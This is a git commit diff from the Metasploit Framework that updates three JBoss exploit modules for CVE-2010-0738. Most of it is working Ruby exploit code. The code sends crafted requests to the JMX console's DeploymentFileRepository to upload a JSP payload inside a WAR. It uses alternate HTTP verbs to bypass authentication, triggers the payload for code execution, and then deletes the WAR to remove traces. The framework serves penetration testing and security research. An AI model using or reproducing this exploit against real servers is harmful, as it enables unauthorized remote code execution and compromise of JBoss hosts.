another update for jboss stuff, thanks Patrick!

git-svn-id: file:///home/svn/framework3/trunk@9596 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-06-23 22:25:03 +00:00
parent 920710a5fd
commit 099b90b0d6
3 changed files with 121 additions and 62 deletions

View File

@ -75,6 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
verb = 'HEAD' verb = 'HEAD'
end end
p = payload
if datastore['SHELL'] == 'automatic' if datastore['SHELL'] == 'automatic'
if not (plat = detect_platform()) if not (plat = detect_platform())
raise RuntimeError, 'Unable to detect platform!' raise RuntimeError, 'Unable to detect platform!'
@ -92,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Payload generation already happened, therefore SHELL will # Payload generation already happened, therefore SHELL will
# already be 'automatic' in the payload regardless of what we set above. # already be 'automatic' in the payload regardless of what we set above.
# To fix this, we regenerate the payload now.. # To fix this, we regenerate the payload now..
return if ((p = regenerate_payload(cli)) == nil) return if ((p = regenerate_payload(platform, target_arch)) == nil)
end end
# The following Beanshell script will write the exploded WAR file to the deploy/ # The following Beanshell script will write the exploded WAR file to the deploy/

View File

@ -18,48 +18,53 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'JBoss Java Class DeploymentFileRepository WAR deployment', 'Name' => 'JBoss Java Class DeploymentFileRepository WAR deployment',
'Description' => %q{ 'Description' => %q{
This module uses the DeploymentFileRepository class in This module uses the DeploymentFileRepository class in
JBoss Application Server (jbossas) to deploy a JSP file JBoss Application Server (jbossas) to deploy a JSP file
in a minimal WAR context. in a minimal WAR context.
}, },
'Author' => [ 'MC', 'Jacob Giannantonio', 'Patrick Hof' ], 'Author' => [ 'MC', 'Jacob Giannantonio', 'Patrick Hof' ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Version' => '$Revision$', 'Version' => '$Revision$',
'References' => 'References' =>
[ [
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST [ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ] [ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ]
], ],
'Privileged' => false, 'Privileged' => false,
'Platform' => ['linux', 'windows' ], 'Platform' => ['linux', 'windows' ],
'Targets' => 'Targets' =>
[ [
[ 'Universal', [ 'Universal',
{
'Arch' => ARCH_JAVA,
'Payload' =>
{ {
'DisableNops' => true, 'Arch' => ARCH_JAVA,
}, 'Payload' =>
} {
], 'DisableNops' => true,
], },
'DefaultTarget' => 0)) }
],
],
'DefaultTarget' => 0))
register_options( register_options(
[ [
Opt::RPORT(8080), Opt::RPORT(8080),
OptString.new('SHELL', [ true, "The system shell to use.", 'automatic']), OptString.new('SHELL', [ true, "The system shell to use.", 'automatic']),
OptString.new('PATH', [ true, "Deployment path", rand_text_alphanumeric(8+rand(8))]), OptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
OptString.new('JSP', [ true, "JSP filename (without .jsp extension)", rand_text_alphanumeric(8+rand(8))]), OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),
OptString.new('PATH', [ true, 'The URI path of the JMX console', '/jmx-console' ]),
OptString.new('VERB', [ true, "The HTTP verb to use", "POST"]), OptString.new('VERB', [ true, "The HTTP verb to use", "POST"]),
], self.class) ], self.class)
end end
def exploit def exploit
jsp_name = datastore['JSP'] || rand_text_alphanumeric(8+rand(8))
app_base = datastore['APPBASE'] || rand_text_alphanumeric(8+rand(8))
p = payload
if datastore['SHELL'] == 'automatic' if datastore['SHELL'] == 'automatic'
if not (plat = detect_platform()) if not (plat = detect_platform())
raise RuntimeError, 'Unable to detect platform!' raise RuntimeError, 'Unable to detect platform!'
@ -74,75 +79,129 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("SHELL set to #{datastore['SHELL']}") print_status("SHELL set to #{datastore['SHELL']}")
return if ((p = regenerate_payload(cli)) == nil) return if ((p = regenerate_payload(plat, target_arch)) == nil)
end end
#
# UPLOAD
#
data = 'action=invokeOpByName' data = 'action=invokeOpByName'
data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository' data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
data << '&methodName=store' data << '&methodName=store'
data << '&argType=java.lang.String' data << '&argType=java.lang.String'
data << '&arg0=' + Rex::Text.uri_encode(datastore['PATH']) + '.war' data << '&arg0=' + Rex::Text.uri_encode(app_base) + '.war'
data << '&argType=java.lang.String' data << '&argType=java.lang.String'
data << '&arg1=' + datastore['JSP'] data << '&arg1=' + jsp_name
data << '&argType=java.lang.String' data << '&argType=java.lang.String'
data << '&arg2=.jsp' data << '&arg2=.jsp'
data << '&argType=java.lang.String' data << '&argType=java.lang.String'
data << '&arg3=' + Rex::Text.uri_encode(payload.encoded) data << '&arg3=' + Rex::Text.uri_encode(p.encoded)
data << '&argType=boolean' data << '&argType=boolean'
data << '&arg4=True' data << '&arg4=True'
if (datastore['VERB'] == "POST") if (datastore['VERB'] == "POST")
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => '/jmx-console/HtmlAdaptor', 'uri' => datastore['PATH'] + '/HtmlAdaptor',
'method' => datastore['VERB'], 'method' => datastore['VERB'],
'data' => data 'data' => data
}, 5) }, 5)
else else
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => '/jmx-console/HtmlAdaptor;index.jsp?' + data, 'uri' => datastore['PATH'] + '/HtmlAdaptor;index.jsp?' + data,
'method' => datastore['VERB'], 'method' => datastore['VERB'],
}, 5) }, 5)
end end
#
# EXECUTE
#
# Using HEAD may trigger a 500 Internal Server Error (at leat on 4.2.3.GA), # Using HEAD may trigger a 500 Internal Server Error (at leat on 4.2.3.GA),
# but the file still gets written. # but the file still gets written.
if (res.code == 200 || res.code == 500) if (res.code == 200 || res.code == 500)
uri = '/' + datastore['PATH'] + '/' + datastore['JSP'] + '.jsp' uri = '/' + app_base + '/' + jsp_name + '.jsp'
print_status("Triggering payload at '#{uri}'...") print_status("Triggering payload at '#{uri}'...")
verb = 'GET' verb = 'GET'
if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST') if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
verb = 'HEAD' verb = 'HEAD'
end end
# JBoss might need some time for the deployment. Try 5 times at most # JBoss might need some time for the deployment. Try 5 times at most
# and sleep 3 seconds in between. # and sleep 3 seconds in between.
5.times do 5.times do
res = send_request_raw( res = send_request_raw(
{ {
'uri' => uri, 'uri' => uri,
'method' => verb, 'method' => verb,
}) })
if !res if !res
print_error("Execution failed on '#{uri}' [No Response], retrying...") print_error("Execution failed on '#{uri}' [No Response], retrying...")
select(nil,nil,nil,3) select(nil,nil,nil,3)
elsif (res.code < 200 or res.code >= 300) elsif (res.code < 200 or res.code >= 300)
print_error("Execution failed on '#{uri}' [#{res.code} #{res.message}], retrying...") print_error("Execution failed on '#{uri}' [#{res.code} #{res.message}], retrying...")
select(nil,nil,nil,3) select(nil,nil,nil,3)
elsif res.code == 200 elsif res.code == 200
print_status("Successfully triggered payload at '#{uri}'.") print_status("Successfully triggered payload at '#{uri}'.")
break break
else
print_error("Denied...")
end end
end end
else
print_error("Denied...") #
# DELETE
#
# The WAR can only be removed by physically deleting it, otherwise it
# will get redeployed after a server restart.
print_status("Undeploying #{uri} by deleting the WAR file via DeploymentFileRepository.remove()...")
res1 = delete_file(Rex::Text.uri_encode(app_base) + '.war', jsp_name, '.jsp')
res2 = delete_file('./', Rex::Text.uri_encode(app_base) + '.war', '')
[res1, res2].each do |res|
if !res
print_error("WARNING: Unable to remove WAR [No Response]")
end
if (res.code < 200 || res.code >= 300)
print_error("WARNING: Unable to remove WAR [#{res.code} #{res.message}]")
end
end
handler
end end
handler end
# Delete a file with DeploymentFileRepository.remove().
def delete_file(folder, name, ext)
data = 'action=invokeOpByName'
data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
data << '&methodName=remove'
data << '&argType=java.lang.String'
data << '&arg0=' + folder
data << '&argType=java.lang.String'
data << '&arg1=' + name
data << '&argType=java.lang.String'
data << '&arg2=' + ext
if (datastore['VERB'] == "POST")
res = send_request_cgi(
{
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'method' => datastore['VERB'],
'data' => data
}, 5)
else
res = send_request_cgi(
{
'uri' => datastore['PATH'] + '/HtmlAdaptor;index.jsp?' + data,
'method' => datastore['VERB'],
}, 5)
end
res
end end
def detect_platform def detect_platform
print_status("Attempting to automatically detect the platform...") print_status("Attempting to automatically detect the platform...")
path = '/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo' path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
res = send_request_raw( res = send_request_raw(
{ {
'uri' => path, 'uri' => path,

View File

@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ] [ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ]
], ],
'Privileged' => true, 'Privileged' => true,
'Platform' => [ 'win', 'linux' ], 'Platform' => [ 'win', 'linux', 'java' ],
'Stance' => Msf::Exploit::Stance::Aggressive, 'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' => 'Targets' =>
[ [
@ -138,6 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
else else
print_status("Using manually select target \"#{mytarget.name}\"") print_status("Using manually select target \"#{mytarget.name}\"")
end end
arch = mytarget.arch
# Find out which shell if we're using a Java target # Find out which shell if we're using a Java target
if (mytarget.name =~ /Java/) if (mytarget.name =~ /Java/)
@ -153,15 +154,13 @@ class Metasploit3 < Msf::Exploit::Remote
end end
print_status("SHELL set to #{datastore['SHELL']}") print_status("SHELL set to #{datastore['SHELL']}")
else else
# set arch/platform from the target # set arch/platform from the target
arch = mytarget['Arch']
plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]] plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
end end
# We must regenerate the payload in case our auto-magic changed something. # We must regenerate the payload in case our auto-magic changed something.
return if ((p = regenerate_payload(cli)) == nil) return if ((p = regenerate_payload(plat, arch)) == nil)
# Generate the WAR containing the payload # Generate the WAR containing the payload
if (mytarget.name =~ /Java/) if (mytarget.name =~ /Java/)